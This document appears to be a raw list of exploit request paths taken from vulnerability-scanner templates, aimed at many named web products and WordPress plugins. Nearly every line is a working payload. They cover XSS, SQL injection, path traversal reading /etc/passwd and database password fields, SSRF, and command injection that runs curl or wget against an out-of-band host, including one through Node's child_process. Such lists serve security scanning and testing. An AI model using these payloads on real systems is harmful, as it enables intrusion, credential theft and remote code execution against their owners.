/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,
/fp-content/
/flatpress/fp-content/
/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=<img%20onerror=alert(document.domain)%20src=1>
/queues
/metrics?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E
/metrics/SanityChecksJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E
/metrics/ActiveStorage::PurgeJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E
/admin/suppliers/view_details.php?id=1
/api/v1/clusters/kubeconfig/k8s
/?url=<img/src=
/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0
/{{route}}
/page?settings[view%20options][closeDelimiter]=x%22)%3bprocess.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27)%3b//
/mbilling/lib/icepay/icepay.php?democ={{randstr}};curl%20{{interactsh-url}};#
/mbilling/lib/icepay/icepay.php?democ={{randstr}};sleep%207;#
/wp-content/plugins/mstore-api/readme.txt
/main/webservices/additional_webservices.php
/?q=./gibbon.sql
/ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile={{url_encode(progressfile)}}
/mifs/aad/api/v2/admins/users
/mifs/asfV3/api/v2/admins/users
/v1/folder?path=%2F
/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/
/{{path}}sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField=&converIsLeafVal=1&condition=&pid=admin&pidField=username
/{{path}}sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField=&converIsLeafVal=1&condition=&pid=admin&pidField=username
/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png
/AHT/AHT_UI/public/js/app.min.js
/index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3dcreated%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d-1910%27)+OR+6100%3d6100%23%26type%3d
/index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3d(SELECT+(CASE+WHEN+(4213%3d4213)+THEN+0x63726561746564+ELSE+(SELECT+7877+UNION+SELECT+7153)+END))%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d’’%26type%3d
/WebInterface
/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}
/WebInterface/{{dirname}}/{{filename}}

/xmlrpc.php
/wp-content/plugins/import-xml-feed/uploads/169227090864de013cac47b.php?cmd=ping+{{interactsh-url}}
/wp-content/plugins/media-library-assistant/readme.txt
/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg
/connectioncheck.php?ip={{url_encode(
/wp-content/plugins/form-maker/readme.txt
/log_proxy?url=http://{{interactsh-url}}
/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23
/api/cors/http:%2f%2fnextchat.{{interactsh-url}}%23
/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B
/?filename=../../../../../../etc/passwd&mphb_action=download
/wp-content/plugins/backup-backup/readme.txt
/wp-content/plugins/backup-backup/includes/backup-heart.php
/index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={
/wp-content/plugins/essential-blocks/readme.txt
/php/ping.php
/wp-content/plugins/better-search-replace/README.txt
/wp-content/plugins/better-search-replace/readme.txt
/
